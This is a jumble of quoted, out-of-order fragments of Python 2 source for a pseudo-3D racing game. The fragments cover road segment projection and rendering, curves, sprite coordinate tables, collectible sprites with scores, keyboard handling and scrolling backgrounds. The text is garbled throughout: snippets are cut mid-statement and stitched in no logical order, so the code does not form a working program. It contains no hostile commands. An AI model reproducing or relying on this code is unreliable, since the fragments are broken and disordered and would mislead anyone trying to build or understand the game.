in e_keys_dn: self.player_di = 1", "80, 'h': 45 }, 'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y': 1018,", "curve, yw) def rd_start_seg_init(self, n=3): seg_n = len(self.segments) if seg_n", "sf = GMFlatpath('flatpath <:::>', 640, 480, road_file='sr_road.txt') sf.mainloop() if __name__", "# image / animate / ... 'obj': None, # need", "seg_n / random.randint(10, 30) for i in range(n): j =", "def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90) def road_reset(self): self.road.rd_reset() self.rdmap_reset()", "if not obj: obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj self.disp_add(obj)", "= 0 self.disp_add(self.bg_sky1) self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0", "return r_events def refresh(self, fps_clock, *args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once)))", "self.player_x xc4 = (rad - xx4) - self.player_x xp1 =", "sprt_at, (car_x + car_w / 2) #print '-' * 40", "#print 'sprt_at', (car_x - car_w / 2), sprt_at, (car_x +", "None or 0 return obj = sprt.get('obj') if not obj:", "enumerate(self.segments): # <2> for i in range(self.seg_draw_n): #''' # <2>", "self.fog.rect.left = 0 self.disp_add(self.fog) def get_seg_base_i(self, pos=None): if pos is", "self.road_reset_from_file() elif k == self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event) elif event.type", "= 0 def update_world(self): if self.player_go == 1: self.speed +=", "a + (b - a) * (1 - math.pow(1 -", "math.cos(engi * (i + 1)) xx4 = rad2 * math.cos(engi", "= 0 self.bg_hills2.rect.left = self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])", "* seg_scale #x_sprt = (xs1 + xs2) / 2.0 #y_sprt", "def rd_sprts_del_all_objs(self): for k, sprt in self.rd_sprt_objs.items(): #print k, sprt", "math.pi /180.0 * 0.1 #theta_i = math.pi /180.0 * 0.5", "xsr2 = self.xp_to_xs(xpr2, self.w) xpr3 = self.xc_to_xp(xcr3, self.d, zc2) xsr3", "return cls(img) # for test #o = SptTmpx((40, 40)) #return", "utils.json_loads(s) return segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 = self.road_w /", "* i #xc4 = -self.road_w / 2 - self.player_x -", "3 in e_keys_dn: self.player_di = 3 if 0 in e_keys_up:", "dx1 xs2 += dx1 xs3 += dx2 #+ dx1 xs4", "['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5': {'imgs':", "0.0) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w)", "10)) # for a3c train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20, 2.0) ##self.add_low_rolling_hills(30,", "r_events def refresh(self, fps_clock, *args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg", "10.0 #print a if a < -1.0: a = -1.0", "0.0) #print '-' * 30 ''' ''' #x# if seg['index']", "FPSptRoadB((640, 240), self.cfg, car=self.car, bg_sky=[self.bg_sky1, self.bg_sky2], bg_hills=[self.bg_hills1, self.bg_hills2], bg_trees=[self.bg_trees1, self.bg_trees2])", "math.tan(theta2) xs1 += dx1 xs2 += dx1 xs3 += dx2", "'w': 298, 'h': 140 }, 'TREE2': { 'x': 1205, 'y':", "under the car #sprts = self.player_seg['sprites'] sprts = self.base_seg['sprites'] if", "[self.xy_to_cntr(p[0], p[1]) for p in pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf,", "''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,", "{'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,}, }", "self.road.seg_len) self.rdmap.rect.top = 0 self.rdmap.rect.left = 80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd", "for i in range(n): rct = [0, i * d,", "{ 'x': 1383, 'y': 894, 'w': 80, 'h': 57 },", "self.player_x_dt self.player_x -= self.speed / 5 + 20 else: pass", "'CAR01': { 'x': 1205, 'y': 1018, 'w': 80, 'h': 56", "e_keys_up = [] e_keys_dn = [] for event in events:", "5 + 20 else: pass p_curve = self.player_seg.get('curve', 0.0) #print", "def draw_on(self, *args, **kwargs): self.fill(self.clr_dark_grass) def add_fog(self): self.fog = FPSptFog(self.size)", "segbi: zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len else: # <1>", "self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90) def road_reset(self): self.road.rd_reset() self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False,", "size, *args, **kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def draw_on(self, *args, **kwargs):", "40) hold = random.randint(10, 40) leave = random.randint(10, 40) if", "i #xc4 = -self.road_w / 2 - self.player_x - curve_d", "#''' # <2> si = (segbi + i) % seg_n", "*args, **kwargs): super(FPStraight, self).__init__() self.cfg = cfg self.bg_sky1 = FPSptBg('img_flatpath/images/background.png',", "= info.get('obj') ''' # TODO: <1> if not obj: obj", "= self.geo_prjc_scale(self.d, zc1) x_rnd = random.randint(1, self.road_w / 2 -", "print 'world y', seg['p1']['world'].get('y', 0.0) #print '-' * 30 '''", "# pnts.append(pnts[0]) cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]", "self.road_w * 4#2 rad1 = rad + self.road_w / 2", "# (int(xsr1), 116 - int(ys1)), # 3, 0) # render", "sky.rect.width < 0: sky.rect.left += sky.rect.width * 2 if sky.rect.left", "theta_i * (i + 1) dx1 = self.seg_len * math.tan(theta1)", "in pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf, c,", "seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y', 0.0) yc1 = yc -", "# NOTE: we now only use the first sprite !", "self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False,", "2: self.speed -= self.speed_dt_dn else: self.speed -= self.speed_dt_na # if", "*args, **kwargs): super(FPSptFog, self).__init__(size) self.c = c self.h = h", "'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y': 1018, 'w': 80, 'h': 45", "'#BBBBBB' }, 'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH':", "yw = 0.0 self.add_road(enter, hold, leave, curve, yw) def rd_start_seg_init(self,", "2 - self.player_x xcl1 = xc1 - self.lane_w xcl2 =", "leave = random.randint(10, 100) self.add_road(enter, hold, leave, 0.0, 0.0) def", "x, y = 0.0, 0.0 tht = 0.0 rad_m =", "268, 'h': 170 }, 'DEAD_TREE2': { 'x': 1205, 'y': 490,", "self.position -= self.track_len # for check score self.last_seg_i = 0", "# for segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) # for a3c", "= 0.0 #elif p < 0.8: # curve = 0.0", "self.rd_sprt_cache[::-1]: self.disp_add(obj) def render_polygon(self, ctx, x1, y1, x2, y2, x3,", "fps_clock, *args, **kwargs): #print '>>> refresh' #''' if self.player_di ==", "} FP_ROAD = { 'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM':", "0 self.game_over = False self.game_score = 0.0 self.tm_start = 0.0", "seg_c[k].append(spr_n) segs_c.append(seg_c) return segs_c def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments)", "None, # get real (random) x from x_pos 'x_i': random.randint(0,", "self.road_w / 2 - self.player_x xc4 = -self.road_w / 2", "True self.game_score = 1.0 if self.player_di == 1: #self.player_x +=", "FPStraight({}) self.straight.rect.top = 0 self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1", "+= tht_d tht -= tht_d rad_m = 20.0#10.0#50.0# cv_s =", "show one break return obj def handle_event(self, events, *args, **kwargs):", "self.check_key(events) def key_to_di(self, k): if k == self.pglc.K_UP: return 0", "1205, 'y': 1018, 'w': 80, 'h': 56 }, 'PLAYER_UPHILL_LEFT': {", "- self.position # for curve xc1 = xc1 - x_curve", "#print '=' * 80 #print 'self.position', self.position # <2> seg_n", "= FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img) # avoid: pygame.error: Width or", "dx2 = self.seg_len * math.tan(theta2) xs1 += dx1 xs2 +=", "- int(ys1)), # 3, 0) # render road sprites #", "x_curve xcr2 = xcr2 - x_curve xcr3 = xcr3 -", "self.lane_w #xcl2 = xc2 + self.lane_w #xcl3 = xc3 -", "= ys1 yp3 = self.yc_to_yp(yc2, self.d, zc2) ys3 = self.yp_to_ys(yp3,", "/ 5 + 20 elif self.player_di == 3: #self.player_x -=", "size, segs, rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size) self.segs = segs", "self.segments[i]['color'] = FP_COLORS['START_Y'] def rd_sprts_init_rand(self, n=None): seg_n = len(self.segments) if", "540 }, 'BILLBOARD08': { 'x': 230, 'y': 5, 'w': 385,", "self.size[0] - 2, y]) # from down to up self.pygm.draw.rect(self.surf,", "-230 self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file", "super(FPStraight, self).__init__() self.cfg = cfg self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top", "self.rdmap_reset() def road_segs_to_file(self, segs_file=None): if not segs_file: segs_file = 'sr_roads/sr_road_'", "zc2 = zw2 - self.camera_z - self.position curve_d = 500", "140 }, 'SEMI': { 'x': 1365, 'y': 490, 'w': 122,", "xs4, ys4, xs3, ys3 print '-' * 30 ''' #", "p_dt #self.player_x -= p_dt self.player_x += p_dt def check_if_car_out_road(self): #", "0, self.size[0] - 2, y]) # from down to up", "'BOULDER2': { 'x': 621, 'y': 897, 'w': 298, 'h': 140", "y1+a]] # reflect the y- d = 116 pnts =", "b_percent = self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve = - (b_curve * b_percent)", "curve_d * i #xc4 = -self.road_w / 2 - self.player_x", "#if 1: #if i < self.seg_draw_n / 2: if i", "+ hold + leave for n in range(enter): self.rd_seg_add(self.util_ease_in(0, curve,", "di is not None: e_keys_dn.append(di) else: r_events.append(event) else: r_events.append(event) self.e_keys_up", "495, 'w': 1280, 'h': 480 }, 'TREES': { 'x': 5,", "1262, 'w': 230, 'h': 220 }, 'BILLBOARD02': { 'x': 245,", "64 yp = yc else: yp = yc * (d", "= random.choice(FP_ROAD_SPRTS.keys()) s = { 'name': sprt, 'type': 1, #", "self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left", "#x#i = int(utils.math_round(pos / self.seg_len)) #i = int(math.floor(pos / self.seg_len))", "< 10: print xs1, ys1, xs2, ys2 print xs4, ys4,", "= 20.0#10.0#50.0# cv_s = 0 cv_l = 0.0 else: rad_m", "all # NOTE: only show one break return obj def", "xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) if 1:#i %", "= ys1 scale_sprt = seg_scale * 8.0#10.0#2.0 obj = self.rd_sprts_render(seg,", "zc) return yp def xp_to_xs(self, xp, w): #xs = w", "1:#i % 2 == 1: xpl1 = self.xc_to_xp(xcl1, self.d, zc1)", "def create_by_img(cls, img): return cls(img) # for test #o =", "60 #pnts = [[x1, y1], [x2, y2], [x3, y3], [x4,", "range(n): rct = [0, i * d, self.size[0], d] #ca", "except Exception as e: #print '-' * 60 pass def", "}, 'CAR02': { 'x': 1383, 'y': 825, 'w': 80, 'h':", "rad1 * math.cos(engi * (i + 1)) xx4 = rad2", "if di is None: di = self.key_to_di_b(event.key) if di is", "math.cos(engi * i) xx3 = rad1 * math.cos(engi * (i", "'y': 760, 'w': 88, 'h': 55 }, 'CAR02': { 'x':", "n for i in range(n): p = random.random() #print p", "= {} for sk, sv in spr.items(): if sk not", "in spr.items(): if sk not in ['obj']: spr_n[sk] = sv", "__init__(self, *args, **kwargs): super(FPSceneA, self).__init__(*args, **kwargs) self.straight = FPStraight({}) self.straight.rect.top", "'x': 1383, 'y': 961, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT':", "n=5): #print 'rd_seg_init_rand', n for i in range(n): rl =", "else: try: obj.scale(scale) except: #print 'scale <2>', scale pass x_i_saved", "cfg, *args, **kwargs): super(FPSptRoadB, self).__init__(size) self.cfg = cfg self.car =", "= 20#454 self.tm_once.rect.left = 600 self.disp_add(self.tm_once) self.prog = FPSptProgress((4, 100),", "xsl2) / 2.0, xsl1, xsl2] #x_sprt = xsr1 x_sprt =", "#print '+', curve, yw n = len(self.segments) #print n if", "0: sky.rect.left -= sky.rect.width * 2 if self.speed <= 0.0:", "0.0) if curve == 0.0: rad_m = 1.0#0.1# else: a", "- self.car.rect.width) / 2 ##self.disp_add(self.car) # car disp add after", "ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i = math.pi", "2 - 10) * seg_scale #x_sprt = (xs1 + xs2)", "self.disp_add(obj) def render_polygon(self, ctx, x1, y1, x2, y2, x3, y3,", "/ 2.0 #x_sprt = random.choice(x_pos) x_i = random.randint(0, len(x_pos) -", "self.pglc.K_LEFT: return 3 else: return None def key_to_di_b(self, k): if", "+ 240 - obj.rect.height obj.rect.left = x_pos[x_i_saved] - obj.rect.width /", "a = 1.0 #tht_d = math.acos(a) tht_d = math.asin(a) #", "0.0, 0.0 tht = 0.0 rad_m = 4.0#2.0#1.0# cv_s =", "self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90) def road_reset(self): self.road.rd_reset() self.rdmap_reset() def road_reset_keep_segs(self):", "n=50): for i in range(n): p = random.random() #print p", "* FP_ROAD['CURVE']['MEDIUM']) elif p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl", "self.position curve_d = 500 #x#xc1 = self.road_w / 2 -", "super(SptTmpx, self).__init__(size) self.draw_on() def draw_on(self, *args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE,", "else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: di = self.key_to_di(event.key) if", "sprt_x < (car_x + car_w / 2): if (car_x -", "self.lane_w xcr1 = self.lane_w - self.player_x xcr2 = -self.lane_w -", "seg in enumerate(self.segments): # <2> for i in range(self.seg_draw_n): #'''", "if not init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if segs_file is not None:", "= self.get_seg_base_i() print 'segbi', segbi self.player_seg = self.segments[segbi] b_curve =", "10.0#5.0#1.0 self.position += random.randint(2, 10) if self.position > self.track_len: self.position", "self.xp_to_xs(xpl3, self.w) xpl4 = self.xc_to_xp(xcl4, self.d, zc2) xsl4 = self.xp_to_xs(xpl4,", "= 0.0 xc1 = self.road_w / 2 - self.player_x xc2", "self.speed if self.position > self.track_len: self.position -= self.track_len # for", "{ 'x': 255, 'y': 1097, 'w': 232, 'h': 152 },", "== 1: self.speed += self.speed_dt_up elif self.player_go == 2: self.speed", "if sky.rect.left + sky.rect.width < 0: sky.rect.left += sky.rect.width *", "# 0:^ 1:> 2:v 3:< self.player_go = 0 # 0:-", "y4-d], [x1, y1-d]] #pnts = [[x1, y1+a], [x2, y2+a], [x3,", "sprt_at = 580 elif x_i == 3: sprt_at = -580", "None: #n = seg_n / 20 n = seg_n /", "self.xp_to_xs(xpr2, self.w) xpr3 = self.xc_to_xp(xcr3, self.d, zc2) xsr3 = self.xp_to_xs(xpr3,", "+ 2) % seg_n] # for test #self.base_seg['color'] = FP_COLORS['FINISH']", "= 0.0 self.tm_end = 0.0 self.tm_last_once = 0.0 self.sky_speed =", "leave, curve, yw) def rd_seg_init_rand_2(self, n=50): for i in range(n):", "seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1), 116 -", "- self.player_x xcr3 = self.lane_w - self.player_x xcr4 = -self.lane_w", "p rl = random.choice([1, -1]) if p < 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "/ 4: theta1 = theta_i * i theta2 = theta_i", "from starfish import pygm from starfish import consts from starfish", "seg_i else: return # NOTE: here we should use the", "c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c, pnts) except Exception as", "self.xp_to_xs(xpr4, self.w) self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3,", "5, 'y': 555, 'w': 135, 'h': 332 }, 'BILLBOARD09': {", "self.speed_dt_na = 1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i = 0 self.score", "'h': 190 }, 'BILLBOARD05': { 'x': 5, 'y': 897, 'w':", "0.0: s = -1.0 if a < -1.0: a =", "self.disp_add(self.bg_trees2) self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top", "print '-' * 30 ''' # grass self.render_polygon(None, 0, ys1,", "dx1 ''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0,", "[x2, y2], [x3, y3], [x4, y4], [x1, y1]] #pnts =", "60 pass def rd_sprts_render(self, seg, x_pos, x_i, y, scale): sprts", "for a3c train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20, 2.0) ##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1", "__init__(self, img_file, *args, **kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def create_by_img(cls, img):", "[] for spr in seg['sprites']: spr_n = {} for sk,", "curve, yw=0.0): #print enter, hold, leave, curve, yw start_y =", "x_i = random.randint(0, len(x_pos) - 1) # NOTE: not used", "328, 'h': 282 }, 'BOULDER3': { 'x': 230, 'y': 280,", "(i+2)*self.seg_len #''' # <1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z']", "2, y]) class FPStraight(pygm.PyGMSprite): def __init__(self, cfg, *args, **kwargs): super(FPStraight,", "def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 = self.road_w / 2 - self.player_x", "/ zc def xc_to_xp(self, xc, d, zc): if zc ==", "cls(img) # for test #o = SptTmpx((40, 40)) #return o", "215, 'h': 540 }, 'BILLBOARD08': { 'x': 230, 'y': 5,", "self.position i = int(pos / self.seg_len) #x#i = int(utils.math_round(pos /", "xc3 - self.lane_w xcl4 = xc4 + self.lane_w xcr1 =", "}, 'BILLBOARD07': { 'x': 313, 'y': 897, 'w': 298, 'h':", "img_file, *args, **kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def create_by_img(cls, img): return", "starfish import utils IMG_POS_BACKGROUND = { 'HILLS': { 'x': 5,", "xsr4 = self.xp_to_xs(xpr4, self.w) self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4,", "i in range(n): j = random.randint(10, seg_n - 10) sprt", "2 ** 64 xp = xc else: xp = xc", "self.xc_to_xp(xcl1, self.d, zc1) xsl1 = self.xp_to_xs(xpl1, self.w) xpl2 = self.xc_to_xp(xcl2,", "curve, yw start_y = self.seg_lasy_y() end_y = start_y + (int(yw)", "# avoid: pygame.error: Width or height is too large if", "= 500 #x#xc1 = self.road_w / 2 - self.player_x -", "= { 'SKY': '#72D7EE', 'TREE': '#005108', 'FOG': '#005108', 'LIGHT': {'road':", "-= dpx1 # <1> #for i, seg in enumerate(self.segments): #", "'y': 480, 'w': 80, 'h': 41 }, 'PLAYER_RIGHT': { 'x':", "= len(self.segments) * self.seg_len #self.track_len = (len(self.segments) - self.seg_draw_n) *", "xpl1 = self.xc_to_xp(xcl1, self.d, zc1) xsl1 = self.xp_to_xs(xpl1, self.w) xpl2", "self.bg_hills2.rect.left = self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top =", "if segs_file is not None: try: segs = self.rd_seg_json_load(segs_file) self.segments", "cv_s: cv_l += curve else: cv_s = 1 continue x", "xc_to_xp(self, xc, d, zc): if zc == 0.0: #xp =", "zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] ''' zw1 = (i+1)*self.seg_len", "= 255 / n * (n - i) ca =", "'PLAYER_RIGHT': { 'x': 995, 'y': 531, 'w': 80, 'h': 41", "if hill.rect.left + hill.rect.width < 0: hill.rect.left += hill.rect.width *", "# <2> if obj: self.disp_del(obj) # NOTE: objs will be", "= 0.0 self.tm_start = 0.0 self.tm_end = 0.0 self.tm_last_once =", "enter = random.randint(10, 100) hold = random.randint(10, 100) leave =", "xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) # for test", "= 0 self.score = 0 self.game_over = False self.game_score =", "= self.seg_len * math.tan(theta_i) #self.player_x -= dpx1 # <1> #for", "FPSceneA(pygm.PyGMScene): def __init__(self, *args, **kwargs): super(FPSceneA, self).__init__(*args, **kwargs) self.straight =", "= ys3 ''' # for test if i < 10:", "math.pi / 2.0 / self.seg_draw_n engi = math.pi / 2.0", "= self.yc_to_yp(yc, self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 =", "None # the segment just under the car self.player_di =", "self.player_x yc = self.camera_h print '=' * 80 print 'self.position',", "'SHORT': 25, 'MEDIUM': 50, 'LONG': 100 }, # num segments", "sptdraw from starfish import utils IMG_POS_BACKGROUND = { 'HILLS': {", "#x_sprt = xsr1 x_sprt = (xsr1 + xsl1) / 2.0", "int(self.sky_speed * p_dt) # always move the cloud #sky.rect.left -=", "{}, 'screen': {}}, 'curve': curve, 'color': c, 'sprites': [], 'looped':", "= { 'index': n, 'p1': {'world': {'z': (n + 1)", "(float(n)+enter)/total)) for n in range(leave): self.rd_seg_add(self.util_ease_out(curve, 0, n/leave), self.util_ease_out(start_y, end_y,", "FP_COLORS['START_Y'] def rd_sprts_init_rand(self, n=None): seg_n = len(self.segments) if n is", "IMG_POS_BACKGROUND = { 'HILLS': { 'x': 5, 'y': 5, 'w':", "ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i", "not sprts: return None for i, info in enumerate(sprts): sprt", "= len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi # TODO:", "percent): return a + (b - a) * (1 -", "self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg() def check_player_di(self, e_keys_dn, e_keys_up): if", "'score': -1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,}, 'rockd': {'imgs': ['img_sprts/rock_d2.png'],", "self.speed -= self.speed_dt_na # if on the grass, slow down", "c self.h = h self.draw_on() def draw_on(self, *args, **kwargs): #self.fill(self.c)", "/ n * (n - i) ca = 200 /", "0: c = FP_COLORS['LIGHT'] #c = {'road': FP_COLOR_WHITE} else: c", "= 60 self.seg_n = 300#200 #self.seg_draw_n = 200#150 self.seg_draw_n =", "'-' * 30 ''' # grass self.render_polygon(None, 0, ys1, self.w,", "random.choice([1, -1]) enter = random.randint(10, 40) hold = random.randint(10, 40)", "total) / total def add_road(self, enter, hold, leave, curve, yw=0.0):", "-FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0) def", "* seg_scale x_pos = [xsr1, xsr2, (xsr1 + xsl1) /", "= 1.0 if a < 0.0: s = -1.0 if", "random.random() * 8.0 yw = 0.0 self.add_road(enter, hold, leave, curve,", "= 0.0 self.add_road(enter, hold, leave, curve, yw) def rd_seg_init_rand_2(self, n=50):", "897, 'w': 298, 'h': 190 }, 'BOULDER2': { 'x': 621,", "z', seg['p1']['world']['z'] print 'world y', seg['p1']['world'].get('y', 0.0) #print '-' *", "xp2 = self.xc_to_xp(xc2, self.d, zc1) xs2 = self.xp_to_xs(xp2, self.w) xp3", "else: a = float(curve) / rad a *= 10.0 #print", "} FP_COLOR_WHITE = '#FFFFFF' FP_COLOR_BLACK = '#000000' FP_COLOR_YELLOW = '#EEEE00'", "kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass'])", "4 == 0: c = FP_COLORS['LIGHT'] #c = {'road': FP_COLOR_WHITE}", "xc3 = (rad - xx3) - self.player_x xc4 = (rad", "0, } self.segments.append(seg) self.track_len = len(self.segments) * self.seg_len #self.track_len =", "= -580 elif x_i == 4: sprt_at = 1100 elif", "rd_reset(self, init=False, keep_segs=False, segs_file=None): #if not init and not keep_segs:", "xp4 = self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1", "= self.segments[si] #''' ''' #x# if seg['index'] < segbi: zw1", "= [] # for sprites render order self.track_len = 0.0", "= self.position - (zw2 - self.camera_z) xp1 = self.xc_to_xp(xc1, self.d,", "#print 'segbi', segbi, ' / ', seg_n self.player_seg = self.segments[segbi]", "- x_curve - dx_curve xcr4 = xcr4 - x_curve -", "= [] e_keys_dn = [] for event in events: #print", "enter = random.randint(10, 40) hold = random.randint(10, 40) leave =", "False self.game_score = 0.0 self.tm_start = 0.0 self.tm_end = 0.0", "4), 'score': FP_ROAD_SPRTS[sprt].get('score', 0), } self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self): for k,", "self.lb1.rect.top = 200 self.lb1.rect.left = 100 self.disp_add(self.lb1) ''' def handle_event(self,", "# for test #o = SptTmpx((40, 40)) #return o class", "= 60 #pnts = [[x1, y1], [x2, y2], [x3, y3],", "obj_k = str(seg['index']) + '_' + str(i) + '_' +", "= self.xp_to_xs(xpr2, self.w) xpr3 = self.xc_to_xp(xcr3, self.d, zc2) xsr3 =", "class FPStraight(pygm.PyGMSprite): def __init__(self, cfg, *args, **kwargs): super(FPStraight, self).__init__() self.cfg", "**kwargs): super(FPStraight, self).__init__() self.cfg = cfg self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])", "(self.position % self.seg_len) ''' #x# zw1 = seg['p1']['world']['z'] zw2 =", "rd_seg_render__3_o(self): \"\"\"curve test 2: draw a circle\"\"\" #theta_i = math.pi", "0.0 self.tm_last_once = 0.0 self.sky_speed = 0.1#0.05# self.hill_speed = 0.2#0.1#", "self.xs = 0.0 self.ys = 0.0 self.d = 200.0#100.0#10.0#30.0#1.0 self.w", "TAB : replay this road * RETURN : go to", "+= p_dt def check_if_car_out_road(self): # decrease score when go out", "self.player_x += 19 if self.player_x > 1000: self.player_di = 3", "w_half) < sprt_at < (car_x + w_half): self.score += scr", "FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg =", "> 1000: self.player_di = 3 #''' #''' self.position += 10.0#5.0#1.0", "40, 'HIGH': 60 }, } FP_ROAD_SPRTS = { 'chest': {'imgs':", "3 in e_keys_up: if self.player_di != 1: self.player_di = 0", "segs, rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size) self.segs = segs self.rad", "# TODO: check if this seg is looped seg_scale =", "sky.rect.left -= 1#self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left", "def main(): #sf = GMFlatpath('flatpath <:::>', 640, 480) sf =", "{ 'x': 625, 'y': 5, 'w': 360, 'h': 360 },", "a new road TODO: * hill road * more road", "self.seg_len, 'y': yw}, 'camera': {}, 'screen': {}}, 'curve': curve, 'color':", "self.game_over = True self.game_score = -1.0 def check_score(self): # make", "xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\"", "zc1) xs1 = self.xp_to_xs(xp1, self.w) xp2 = self.xc_to_xp(xc2, self.d, zc1)", "self.player_x # <3> #engi = math.pi / 2.0 / self.seg_draw_n", "#+ dx1 #''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4,", "xcr4 = -self.lane_w - self.player_x yc = self.camera_h #print '='", "xc2 = (rad - xx2) - self.player_x xc3 = (rad", "v else: seg_c[k] = [] for spr in seg['sprites']: spr_n", "'SEMI': { 'x': 1365, 'y': 490, 'w': 122, 'h': 144", "}, 'BILLBOARD03': { 'x': 5, 'y': 1262, 'w': 230, 'h':", "[x4, y4-d], [x1, y1-d]] #pnts = [[x1, 